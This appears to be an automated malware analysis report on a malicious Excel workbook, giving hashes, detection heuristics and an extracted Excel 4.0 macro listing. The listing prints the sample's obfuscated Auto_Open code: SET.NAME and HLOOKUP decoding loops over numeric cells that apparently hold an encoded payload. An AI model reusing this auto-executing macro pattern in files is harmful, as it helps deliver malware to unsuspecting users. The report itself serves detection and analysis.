Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4a913212c5dd1ef7…

MALICIOUS

Office (OLE)

Size: 36.5 KB
Created: 2020-11-27 11:43:51
Authoring application: Microsoft Excel
First seen: 2021-03-31
MD5: d68adc87faf946d3db2da5bbce07edae
SHA-1: 37b0ebb42d5fc06e4d80fe53ec713011bb81707a
SHA-256: 4a913212c5dd1ef74b7d363042d51f25fdf5231166c5f4b4f3fc5444e860b030
Risk Score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6915 bytes
SHA-256: 195d2d61a71069550f3c4c8841224116b3261b97e75f17875baeaff81b7bb4e3

Preview script (first 1,000 lines of the extracted script):
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  FZRyAlDSBVf
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!G165 
' 0018     26 LABEL : Cell Value, String Constant - bkVaByrLXEu len=0 
' 0018     22 LABEL : Cell Value, String Constant - busOUSI len=0 
' 0018     26 LABEL : Cell Value, String Constant - enRZwagpdDC len=0 
' 0018     25 LABEL : Cell Value, String Constant - fbuXoFqhal len=0 
' 0018     22 LABEL : Cell Value, String Constant - fMdcHav len=0 
' 0018     25 LABEL : Cell Value, String Constant - GDnPfTXdUa len=0 
' 0018     24 LABEL : Cell Value, String Constant - GrEBSJkiS len=0 
' 0018     27 LABEL : Cell Value, String Constant - GRREbrVgllDv len=0 
' 0018     22 LABEL : Cell Value, String Constant - gweTQgO len=0 
' 0018     22 LABEL : Cell Value, String Constant - hhPGEGE len=0 
' 0018     20 LABEL : Cell Value, String Constant - jCltU len=0 
' 0018     27 LABEL : Cell Value, String Constant - OCxwIQMeXSxu len=0 
' 0018     22 LABEL : Cell Value, String Constant - PJNyOie len=0 
' 0018     25 LABEL : Cell Value, String Constant - PnPSgQWGOm len=0 
' 0018     23 LABEL : Cell Value, String Constant - VsTPaltv len=0 
' 0018     23 LABEL : Cell Value, String Constant - wnodfiNU len=0 
' 0018     26 LABEL : Cell Value, String Constant - YrAHVmlJYzS len=0 
' 0018     26 LABEL : Cell Value, String Constant - YtZXVYZYWaw len=0 
' 0018     26 LABEL : Cell Value, String Constant - YXeePaCLzuX len=0 
' 0018     24 LABEL : Cell Value, String Constant - zpXIfFQZK len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  FZRyAlDSBVf,P48,"",868.00000000000000000000
'  FZRyAlDSBVf,P49,"",-18.00000000000000000000
'  FZRyAlDSBVf,P50,"",-751.00000000000000000000
'  FZRyAlDSBVf,P51,"",-809.00000000000000000000
'  FZRyAlDSBVf,P52,"",874.00000000000000000000
'  FZRyAlDSBVf,P53,"",-928.00000000000000000000
'  FZRyAlDSBVf,G81,"SET.NAME("GDnPfTXdUa",0+VALUE("0"))",""
'  FZRyAlDSBVf,G85,"SET.NAME("VsTPaltv",GDnPfTXdUa)",""
'  FZRyAlDSBVf,G90,"SET.NAME("hhPGEGE",GDnPfTXdUa)",""
'  FZRyAlDSBVf,G93,"SET.NAME("OCxwIQMeXSxu",COUNTA(YXeePaCLzuX))",""
'  FZRyAlDSBVf,G95,"SET.NAME("busOUSI",COUNTA(YrAHVmlJYzS))",""
'  FZRyAlDSBVf,G97,[],""
'  FZRyAlDSBVf,G99,"SET.NAME("gweTQgO","")",""
'  FZRyAlDSBVf,G102,"VsTPaltv",""
'  FZRyAlDSBVf,G106,"SET.NAME("bkVaByrLXEu",HLOOKUP("*",YXeePaCLzuX,VsTPaltv,FALSE))",""
'  FZRyAlDSBVf,G110,"jCltU",""
'  FZRyAlDSBVf,G113,"SET.NAME("GRREbrVgllDv",GDnPfTXdUa)",""
'  FZRyAlDSBVf,G115,[],""
'  FZRyAlDSBVf,G120,"GRREbrVgllDv",""
'  FZRyAlDSBVf,G123,"PnPSgQWGOm",""
'  FZRyAlDSBVf,G126,"enRZwagpdDC",""
'  FZRyAlDSBVf,G128,"fMdcHav",""
'  FZRyAlDSBVf,G132,"SET.NAME("PJNyOie",VALUE(HLOOKUP("*",YrAHVmlJYzS,fMdcHav,FALSE)))",""
'  FZRyAlDSBVf,G137,"zpXIfFQZK",""
'  FZRyAlDSBVf,G142,"gweTQgO",""
'  FZRyAlDSBVf,G146,"hhPGEGE",""
'  FZRyAlDSBVf,G149,NEXT(),""
'  FZRyAlDSBVf,G151,"wnodfiNU",""
'  FZRyAlDSBVf,G154,[],""
'  FZRyAlDSBVf,G156,"fbuXoFqhal",""
'  FZRyAlDSBVf,G158,NEXT(),""
'  FZRyAlDSBVf,G162,RETURN(),""
'  FZRyAlDSBVf,G194,"SET.NAME("YtZXVYZYWaw",G81)",""
'  FZRyAlDSBVf,G199,"YXeePaCLzuX",""
'  FZRyAlDSBVf,G202,"SET.NAME("YrAHVmlJYzS",R65C14)",""
'  FZRyAlDSBVf,G206,"SET.NAME("fbuXoFqhal",215)",""
'  FZRyAlDSBVf,G209,"SET.NAME("GrEBSJkiS",7)",""
'  FZRyAlDSBVf,G214,YtZXVYZYWaw(),""
'  FZRyAlDSBVf,G215,HALT(),""